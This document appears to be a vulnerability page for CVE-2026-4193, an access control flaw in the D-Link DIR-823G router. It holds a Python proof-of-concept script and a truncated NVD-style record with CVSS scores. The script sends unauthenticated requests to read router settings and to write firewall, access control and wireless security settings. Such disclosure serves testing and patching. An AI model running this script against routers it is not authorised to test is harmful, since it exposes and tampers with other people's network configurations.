CVE-2026-4193

#!/usr/bin/env python3 """ CVE-2026-4193 PoC - D-Link DIR-823G Improper Access Control Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys import json TARGET = "http://192.168.0.1" # Router default IP def exploit_get_settings(): """Exploit: Get sensitive settings without authentication""" endpoints = [ "/goform/GetDDNSSettings", "/goform/GetDeviceDomainName", "/goform/GetDeviceSettings", "/goform/GetDMZSettings", "/goform/GetFirewallSettings", "/goform/GetGuestNetworkSettings", "/goform/GetLanWanConflictInfo", "/goform/GetLocalMacAddress", "/goform/GetNetworkSettings", "/goform/GetQoSSettings", "/goform/GetRouterInformationSettings", "/goform/GetRouterLanSettings", "/goform/GetWanSettings" ] print("[*] Testing CVE-2026-4193 - Improper Access Control") print("[*] Target:", TARGET) print("-" * 50) for endpoint in endpoints: try: url = TARGET + endpoint response = requests.get(url, timeout=5) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Response: {response.text[:200]}") else: print(f"[-] Protected: {endpoint}") except Exception as e: print(f"[!] Error testing {endpoint}: {e}") def exploit_set_settings(): """Exploit: Modify settings without authentication""" endpoints = [ "/goform/SetAccessCtlList", "/goform/SetAccessCtlSwitch", "/goform/SetDeviceSettings", "/goform/SetGuestWLanSettings", "/goform/SetIPv4FirewallSettings", "/goform/SetNetworkSettings", "/goform/SetWLanRadioSecurity" ] print("\n[*] Testing write access without authentication...") for endpoint in endpoints: try: url = TARGET + endpoint data = {"test": "value"} response = requests.post(url, data=data, timeout=5) if response.status_code in [200, 500]: print(f"[!] Potentially VULNERABLE (write): {endpoint}") print(f" Status: {response.status_code}") except Exception as e: print(f"[!] Error testing {endpoint}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET = sys.argv[1] exploit_get_settings() exploit_set_settings() print("\n[*] Scan complete. If vulnerable, update firmware immediately.")

{"cve": {"id": "CVE-2026-4193", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:02.893", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in D-Link DIR-823G 1.0.2B05. The affected element is the function GetDDNSSettings/GetDeviceDomainName/GetDeviceSettings/GetDMZSettings/GetFirewallSettings/GetGuestNetworkSettings/GetLanWanConflictInfo/GetLocalMacAddress/GetNetworkSettings/GetQoSSettings/GetRouterInformationSettings/GetRouterLanSettings/GetWanSettings/SetAccessCtlList/SetAccessCtlSwitch/SetDeviceSettings/SetGuestWLanSettings/SetIPv4FirewallSettings/SetNetworkSettings/SetNetworkTomographySettings/SetNTPServerSettings/SetRouterLanSettings/SetStaticClientInfo/SetStaticRouteSettings/SetWLanRadioSecurity/SetWPSSettings/UpdateClientInfo of the component goahead. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en D-Link DIR-823G 1.0.2B05. El elemento afectado es la función GetDDNSSettings/GetDeviceDomainName/GetDeviceSettings/GetDMZSettings/GetFirewallSettings/GetGuestNetworkSettings/GetLanWanConflictInfo/GetLocalMacAddress/GetNetworkSettings/GetQoSSettings/GetRouterInformationSettings/GetRouterLanSettings/GetWanSettings/SetAccessCtlList/SetAccessCtlSwitch/SetDeviceSettings/SetGuestWLanSettings/SetIPv4FirewallSettings/SetNetworkSettings/SetNetworkTomographySettings/SetNTPServerSettings/SetRouterLanSettings/SetStaticClientInfo/SetStaticRouteSettings/SetWLanRadioSecurity/SetWPSSettings/UpdateClientInfo del componente goahead. Dicha manipulación conduce a controles de acceso inadecuados. El ataque puede ser lanzado remotamente. El exploit ha sido divulgado públicamente y puede ser utilizado. Esta vulnerabilidad solo afecta a productos que ya no reciben soporte por parte del mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpa ... (truncated)